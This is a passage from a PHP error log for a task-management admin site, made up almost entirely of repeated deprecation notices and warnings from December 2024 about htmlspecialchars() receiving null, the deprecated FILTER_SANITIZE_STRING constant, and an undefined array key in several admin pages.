12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:17:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:17:59 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:18:16 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:18:39 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:18:50 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:19:08 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:19:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:19:52 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:20:02 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:20:36 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:20:52 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:21:09 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:21:58 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:22:09 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:23:00 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:23:10 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:31:24 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:31:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 12:32:12 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:31:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 16:32:52 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:33:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:33:37 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:34:00 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:34:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:34:41 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:34:57 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:37:12 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:37:46 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:38:11 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:38:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 16:39:29 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [09-Dec-2024 09:39:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Dec-2024 09:40:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Dec-2024 09:40:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Dec-2024 09:49:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Dec-2024 09:49:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Dec-2024 09:49:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Dec-2024 09:49:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Dec-2024 21:37:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Dec-2024 21:37:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Dec-2024 21:37:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Dec-2024 21:38:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Dec-2024 21:38:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Dec-2024 21:39:24 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [09-Dec-2024 21:39:52 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:40:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [09-Dec-2024 21:42:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 